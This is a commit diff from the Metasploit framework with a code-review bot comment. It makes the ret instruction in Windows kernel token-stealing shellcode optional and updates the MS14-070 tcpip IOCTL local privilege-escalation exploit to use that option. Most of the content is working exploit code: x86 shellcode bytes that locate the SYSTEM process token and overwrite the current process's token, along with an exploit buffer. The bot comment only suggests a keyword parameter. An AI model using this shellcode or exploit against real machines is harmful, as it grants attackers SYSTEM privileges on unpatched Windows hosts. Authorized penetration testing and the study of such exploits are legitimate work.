
Make the ret instruction for token stealing optional

Spencer McIntyre 4 years ago
parent
commit
5a39ba32f6

+ 9
- 5
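--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -116,10 +116,12 @@ module Exploit::Local::WindowsKernel
   #   original token to so it can be restored later.
   # @param arch [String] The architecture to return shellcode for. If this is nil,
   #   the arch will be guessed from the target and then module information.
+  # @param append_ret [Boolean] Append a ret instruction for use when being called
+  #   in place of HaliQuerySystemInformation.
   # @return [String] The token stealing shellcode.
   # @raise [ArgumentError] If the arch is incompatible.
   #
-  def token_stealing_shellcode(target, backup_token = nil, arch = nil)
+  def token_stealing_shellcode(target, backup_token = nil, arch = nil, append_ret = true)
     arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
     if arch.nil? && module_info['Arch']
       arch = module_info['Arch']
@@ -144,15 +146,17 @@ module Exploit::Local::WindowsKernel
         tokenstealing << "\x89\x1d" + [backup_token].pack('V')                       # mov dword ptr ds:backup_token, ebx   # Optionaly write a copy of the token to the address provided
       end
       tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-      tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+      tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax, 88h                       | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
       tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-      tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
-      tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+      tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================|
+      tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx, dword ptr [eax+0C8h]    # Retrieves TOKEN and stores on EDX
       tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
       tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
       tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
       tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
-      tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+      if append_ret
+        tokenstealing << "\xc2\x10"                                                  # ret 10h                          # Away from the kernel!
+      end
     else
       # if this is reached the issue most likely exists in the exploit module
       print_error('Unsupported arch for token stealing shellcode')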
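Review bot: `append_ret` is introduced as a fourth positional boolean in the new `def token_stealing_shellcode` line, which forces the only caller (modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb in this same commit) to write `token_stealing_shellcode(target, nil, nil, false)`, where the two `nil`s exist purely to reach the flag and the bare `false` says nothing about what it disables. A keyword parameter keeps every existing caller working and makes the intent readable at the call site: `def token_stealing_shellcode(target, backup_token = nil, arch = nil, append_ret: true)` and `token_stealing_shellcode(target, append_ret: false)`. The new YARD entry should also state the default, e.g. `# @param append_ret [Boolean] Append a ret instruction ... Defaults to true.`, since callers that rely on the trailing ret are not otherwise told they get it. The method continues past both hunks; if another architecture branch also ends with its own ret, it presumably needs to honor `append_ret` the same way, which this hunk does not show.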

+ 1
- 1
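--- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
+++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
 
-    sc  = token_stealing_shellcode(target)[0..-3]
+    sc  = token_stealing_shellcode(target, nil, nil, false)
     # move up the stack frames looking for nt!KiSystemServicePostCall
     sc << "\x31\xc9"                     # xor ecx, ecx
     sc << "\x89\xeb"                     # mov ebx, ebp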
